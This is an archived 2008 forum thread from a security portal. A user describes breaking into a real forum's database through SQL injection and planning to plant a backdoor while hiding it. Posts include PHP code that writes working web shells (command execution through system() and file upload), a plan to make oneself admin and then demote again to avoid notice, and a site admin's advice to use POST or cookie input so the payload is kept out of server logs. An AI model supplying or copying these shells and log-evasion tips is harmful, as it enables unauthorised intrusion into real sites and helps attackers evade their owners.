 |
|
 |
 |
|
 |
IT Security and Insecurity Portal |
|
 |
Got access to db, but don't know what to do... |
 |
 Posted: Sat Apr 19, 2008 6:36 pm |
 |
|
| bleh |
| Regular user |
 |
|
| Joined: Apr 19, 2008 |
| Posts: 19 |
|
|
|
 |
|
 |
|
Hey
I managed to get full access to the forum database through a mod sql injection. Now the problem is, it takes ages to crack the passwords since they're salted. I know I can change my user status to admin, but that would raise a big red flag, so I was wondering if anyone has experience with load_file. |
|
|
|
|
| Posted: Sat Apr 19, 2008 7:12 pm |
|
|
| pexli |
| Valuable expert |
 |
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| Try to decrypt admin hash and log in into admin panel.Then just upload shell. |
|
|
|
|
| Posted: Sat Apr 19, 2008 7:17 pm |
|
|
| bleh |
| Regular user |
|
|
| Joined: Apr 19, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
i've got an amd 1500 with 512 ram... how long do you think it will take it? 
I'll make myself admin then upload shell then make me a normal user again. |
|
|
|
|
| Posted: Sat Apr 19, 2008 7:45 pm |
|
|
| pexli |
| Valuable expert |
|
|
| Joined: May 24, 2007 |
| Posts: 665 |
| Location: Bulgaria |
|
|
|
|
|
|
| bleh wrote: | i've got an amd 1500 with 512 ram... how long do you think it will take it?
I'll make myself admin then upload shell then make me a normal user again. |
10 seconds or 10 years.No body know. |
|
|
|
|
| Posted: Sat Apr 19, 2008 7:51 pm |
|
|
| bleh |
| Regular user |
|
|
| Joined: Apr 19, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
I have been running passwordpro for over 3 hours and nothing. I will just let it run. Meanwhile I'll do my hack in the middle of the night so there will be few people online 
I've tested this backdoor for the plugin on my local vb, and it works. What do you think of it?
| Code: |
$f = fopen("mod_cp.php", "w+");
fputs($f, "<? system($"."_GET['c']); ?>");
fclose($f);
chmod("mod_cp.php", 777);
|
|
|
|
|
|
|
Re: Got access to db, but don't know what to do... |
|
| Posted: Sat Apr 19, 2008 7:52 pm |
|
|
| waraxe |
| Site admin |
 |
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| bleh wrote: | Hey
I managed to get full access to the forum database through a mod sql injection. Now the problem is, it takes ages to crack the passwords since they're salted. I know I can change my user status to admin, but that would raise a big red flag, so I was wondering if anyone has experience with load_file. |
You can use "LOAD_FILE()" only if you have FILE privileges. I'd say, that most of the real world servers will not give FILE privs to casual user. If website is hosted in shared environment (shared hosting, virtual server), then probably you can't do LOAD_FILE. If website is located on dedicated server (for example website of some organisation, school, etc), then you MAY have FILE privileges, IF admin was lazy enough to not have trouble with security  |
|
|
|
|
|
|
|
|
| Posted: Sat Apr 19, 2008 7:56 pm |
|
|
| waraxe |
| Site admin |
|
|
| Joined: May 11, 2004 |
| Posts: 2407 |
| Location: Estonia, Tartu |
|
|
|
|
|
|
| bleh wrote: | I have been running passwordpro for over 3 hours and nothing. I will just let it run. Meanwhile I'll do my hack in the middle of the night so there will be few people online
I've tested this backdoor for the plugin on my local vb, and it works. What do you think of it?
| Code: |
$f = fopen("mod_cp.php", "w+");
fputs($f, "<? system($"."_GET['c']); ?>");
fclose($f);
chmod("mod_cp.php", 777);
|
|
Use $_POST or $_COOKIE, because $_GET means, that webserver will log your payload ... |
|
|
|
|
|
|
|
|
| Posted: Sat Apr 19, 2008 8:59 pm |
|
|
| bleh |
| Regular user |
|
|
| Joined: Apr 19, 2008 |
| Posts: 19 |
|
|
|
|
|
|
|
| waraxe wrote: |
Use $_POST or $_COOKIE, because $_GET means, that webserver will log your payload ... |
Oh crap, that's not good
I've rewritten it. Thanks!
| Code: |
$f = fopen("userprofile.php", "w+");
fputs($f, "<?
if (@$"."_FILES['f']['tmp_name'])
move_uploaded_file($"."_FILES['f']['tmp_name'], dirname(__FILE__).'\\\'.basename($"."_FILES['f']['name']));
if (@$"."_POST['c'])
system($"."_POST['c']);
?>
<form enctype='multipart/form-data' action='userprofile.php' method='post'>
<input name='c'><br>
<input name='f' type='file'><br>
<input type=submit value=Ok>
</form>");
fclose($f);
chmod("userprofile.php", 777);
|
|
|
|
|
|
www.waraxe.us Forum Index -> vBulletin Board
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
Discussions
Tools
Content
Info
Membership:
Latest: 
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 156
Members: 0
Total: 156
